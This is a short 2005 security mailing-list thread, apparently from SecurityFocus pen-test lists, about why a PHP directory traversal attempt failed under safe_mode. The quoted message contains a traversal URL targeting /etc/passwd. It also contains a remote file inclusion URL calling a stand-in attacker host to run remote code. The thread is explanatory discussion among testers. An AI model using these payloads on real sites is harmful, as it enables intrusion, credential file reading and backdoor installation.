Re: PHP Directory Transversal

["Andres Molinetti" <andymolinetti () hotmail com>]

It seems that the problem was that it had "safe_mode" on....

Thank you all for the replies!

Cheers, Andy

> From: John GALLET <john.gallet () wanadoo fr>
> To: Andres Molinetti <andymolinetti () hotmail com>
> CC: pen-test () securityfocus com, <webappsec () securityfocus com>
> Subject: Re: PHP Directory Transversal
> Date: Mon, 14 Mar 2005 09:06:25 +0100 (CET)
>
> Hi there,
>
> > Therefore, I tried doing a
> > www.example.com/static.php?page=../../../../../../etc/passwd
> > but I get an error saying that file doesn't exist.
> > I user the same source code in my server, and I could retrieve the
> > file...what can be happening? I don't think it is under a chroot jail...
>
> What you can or can not read depends on the configuration of php
> (include_path vs safe mode for example). Have a look at :
> http://fr3.php.net/features.safe-mode
>
> Now the real risk is not so much reading some source code as executing
> some other people's code.
>
> www.example.com/static.php?page=http://evilcracker.com/evil_code.txt
> has good chances of also getting executed, which opens the path to
> install any backdoor, download perl scripts/trojans, etc...
>
> HTH
> JG

_________________________________________________________________
Un amor, una aventura, compañía para un viaje. Regístrate gratis en MSN Amor 
& Amistad. http://match.msn.es/match/mt.cfm?pg=channel&tcid=162349